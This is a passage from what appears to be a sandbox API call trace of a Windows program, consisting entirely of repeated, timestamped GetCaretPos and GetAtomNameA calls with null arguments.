lpBuffer=0x0) returned 0x0 [0048.891] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.891] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.891] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.891] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.891] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.891] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.891] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.891] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.891] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.891] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.891] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.891] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.891] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.891] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.891] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.891] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.892] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.892] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.892] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.892] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.892] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.892] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.892] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.892] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.892] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.892] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.892] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.892] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.892] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.892] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.892] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.892] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.892] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.892] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.892] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.892] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.892] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.892] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.892] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.892] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.892] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.892] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.892] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.892] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.892] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.892] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.892] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.892] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.892] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.892] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.893] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.893] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.893] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.893] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.893] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.893] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.893] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.893] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.893] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.893] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.893] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.893] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.893] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.893] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.893] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.893] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.893] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.893] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.893] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.893] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.893] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.893] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.893] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.893] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.893] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.893] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.893] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.893] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.893] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.893] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.893] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.893] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.893] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.894] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.894] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.894] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.894] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.894] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.894] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.894] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.894] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.894] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.894] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.894] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.894] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.894] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.894] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.894] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.894] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.894] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.894] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.894] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.894] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.894] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.894] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.894] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.894] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.894] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.894] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.894] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.894] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.894] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.894] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.894] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.894] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.894] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.895] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.895] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.895] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.895] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.895] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.895] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.895] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.895] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.895] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.895] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.895] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.895] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.895] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.895] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.895] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.895] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.895] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.895] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.895] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.895] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.895] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.895] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.895] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.895] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.895] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.895] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.895] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.895] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.895] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.895] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.895] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.895] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.895] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.895] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.896] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.896] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.896] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.896] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.896] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.896] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.896] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.896] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.896] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.896] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.896] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.896] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.896] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.896] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.896] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.896] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.896] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.896] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.896] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.896] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.896] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.896] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.896] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.896] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.896] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.896] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.896] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.896] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.896] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.896] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.896] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.896] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.896] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.897] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.897] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.897] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.897] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.897] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.897] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.897] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.897] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.897] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.897] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.897] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.897] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.897] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.897] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.897] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.897] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.897] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.897] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.897] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.898] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.898] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.898] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.898] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.898] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.898] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.898] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.898] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.898] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.898] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.898] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.898] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.898] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.898] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.898] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.898] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.898] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.898] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.898] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.898] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.898] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.898] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.898] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.898] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.898] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.898] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.898] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.898] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.898] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.898] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.898] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.898] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.898] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.898] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.899] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.899] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.899] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.899] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.899] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.899] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.899] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.899] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.899] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.899] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.899] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.899] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.899] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.899] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.899] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.899] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.899] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.899] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.899] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.899] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.899] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.899] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.899] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.899] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.899] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.899] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.899] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 